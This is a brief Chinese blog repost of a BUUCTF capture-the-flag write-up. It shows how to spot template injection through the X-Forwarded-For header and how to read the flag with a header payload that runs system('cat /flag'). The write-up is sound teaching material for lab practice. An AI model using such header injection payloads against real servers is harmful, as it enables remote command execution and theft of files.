BUUCTF WEB The_mystery_of_ip

常规思路,跟ip有关的无非就是那么几个HTTP头 试一下最常规的XFF头,果然是,同样跟IP有关的是SSTI 访问flag.php,加头: X-Forwarded-For:127.0.0.1 回显127.0.0.1,XFF验证 X-Forwarded-For:127.0.0.1{{1+1}} 回显:127.0.0.12,SSTI实锤 那么尝试system,没被禁,好办了 更正一下,根目录访问目录被关了,不会回显的,毕竟是真实的网站,当前目录还是有访问权限的 猜吧,flag在/ 拿flag: X-Forwarded-For:127.0.0.1{{system(‘cat /flag’)}} 参考视频链接:https://www.bilibili.com/video/BV1FY411x7ko/

BUUCTF WEB The_mystery_of_ip最先出现在Python成神之路

版权声明:
作者:siwei
链接:https://www.techfm.club/p/8322.html
来源:TechFM
文章版权归作者所有,未经允许请勿转载。

THE END
分享
二维码
< <上一篇
下一篇>>